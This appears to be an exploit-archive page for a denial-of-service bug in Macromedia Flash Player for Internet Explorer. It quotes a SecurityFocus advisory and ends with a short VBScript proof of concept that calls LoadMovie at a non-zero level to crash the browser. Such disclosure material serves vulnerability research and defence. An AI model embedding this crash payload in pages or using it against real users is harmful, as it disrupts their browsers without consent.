header-logo
Suggest Exploit
vendor:
Flash Player for Internet Explorer
by:
Unknown
N/A
CVSS
N/A
Denial of Service
Unknown
CWE
Product Name: Flash Player for Internet Explorer
Affected Version From: Unknown
Affected Version To: Unknown
Patch Exists: Unknown
Related CWE: Unknown
CPE: Unknown
Metasploit:
Other Scripts:
Platforms Tested: Windows XP Professional SP1 and SP2
Unknown

Denial of Service in Macromedia Flash Player for Internet Explorer

The vulnerability exists in the 'LoadMovie' function of Macromedia Flash Player for Internet Explorer. By calling the function and loading a flash movie into a non-zero level, an attacker can cause an instance of Internet Explorer to crash.

Mitigation:

Unknown
Source

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/10057/info

It has been reported that Macromedia Flash Player for Internet Explorer may be prone to a denial of service vulnerability that may cause an instance of Internet Explorer to crash. The issue is reported to exist in the 'LoadMovie' function by calling the function and loading a flash movie into a non-zero level in the following manner:

LoadMovie 1,"c6ool.swf"

This vulnerability is reported to be tested in Flash Player 7.0 r19 running on WindowsXP Professional SP1 and SP2. 

<script language=vbscript>
Set mymy2= CreateObject("ShockwaveFlash.ShockwaveFlash.1")
mymy2.LoadMovie 1,"c6ool.swf"
</script>